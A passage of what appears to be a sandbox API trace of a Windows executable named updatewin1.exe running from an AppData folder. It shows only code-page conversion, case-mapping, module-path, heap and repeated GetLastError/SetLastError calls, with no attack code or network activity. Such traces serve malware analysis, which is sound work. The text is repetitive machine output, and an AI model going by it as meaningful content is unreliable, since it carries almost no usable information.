lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0082.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䟲갮㞕AĀ") returned 256 [0082.897] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䟲갮㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0082.897] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䟲갮㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0082.897] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]\n¹®\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0082.897] GetLastError () returned 0x0 [0082.897] SetLastError (dwErrCode=0x0) [0082.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0082.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䟲갮㞕AĀ") returned 256 [0082.897] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䟲갮㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0082.897] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䟲갮㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0082.897] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]\n¹®\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0082.898] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe")) returned 0x5f [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.898] SetLastError (dwErrCode=0x0) [0082.898] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.899] SetLastError (dwErrCode=0x0) [0082.899] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.900] SetLastError (dwErrCode=0x0) [0082.900] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.901] SetLastError (dwErrCode=0x0) [0082.901] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.902] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.902] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.902] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.902] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.902] GetLastError () returned 0x0 [0082.902] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.903] SetLastError (dwErrCode=0x0) [0082.903] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.904] SetLastError (dwErrCode=0x0) [0082.904] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.905] GetLastError () returned 0x0 [0082.905] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.906] SetLastError (dwErrCode=0x0) [0082.906] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.907] SetLastError (dwErrCode=0x0) [0082.907] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.908] SetLastError (dwErrCode=0x0) [0082.908] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.909] SetLastError (dwErrCode=0x0) [0082.909] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.910] GetLastError () returned 0x0 [0082.910] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x0, Size=0x74) returned 0x1f81990 [0082.911] GetLastError () returned 0x0 [0082.911] SetLastError (dwErrCode=0x0) [0082.911] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.912] GetLastError () returned 0x0 [0082.912] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.913] GetLastError () returned 0x0 [0082.913] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.914] SetLastError (dwErrCode=0x0) [0082.914] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.915] SetLastError (dwErrCode=0x0) [0082.915] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.916] SetLastError (dwErrCode=0x0) [0082.916] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.917] SetLastError (dwErrCode=0x0) [0082.917] GetLastError () returned 0x0 [0082.918] SetLastError (dwErrCode=0x0) [0082.918] GetLastError () returned 0x0 [0082.918] SetLastError (dwErrCode=0x0) [0082.918] GetLastError () returned 0x0 [0082.918] SetLastError (dwErrCode=0x0) [0082.918] GetLastError () returned 0x0 [0082.918] SetLastError (dwErrCode=0x0) [0082.918] GetLastError () returned 0x0 [0082.918] SetLastError (dwErrCode=0x0) [0082.918] GetLastError () returned 0x0 [0082.918] SetLastError (dwErrCode=0x0) [0082.918] GetLastError () returned 0x0 [0082.919] SetLastError (dwErrCode=0x0) [0082.919] GetLastError () returned 0x0 [0082.919] SetLastError (dwErrCode=0x0) [0082.919] GetLastError () returned 0x0 [0082.919] SetLastError (dwErrCode=0x0) [0082.919] GetLastError () returned 0x0 [0082.919] SetLastError (dwErrCode=0x0) [0082.919] GetLastError () returned 0x0 [0082.919] SetLastError (dwErrCode=0x0) [0082.919] GetLastError () returned 0x0 [0082.919] SetLastError (dwErrCode=0x0) [0082.919] GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.920] GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.920] GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.920] GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.920] GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.920] GetLastError () returned 0x0 [0082.920] SetLastError (dwErrCode=0x0) [0082.920] 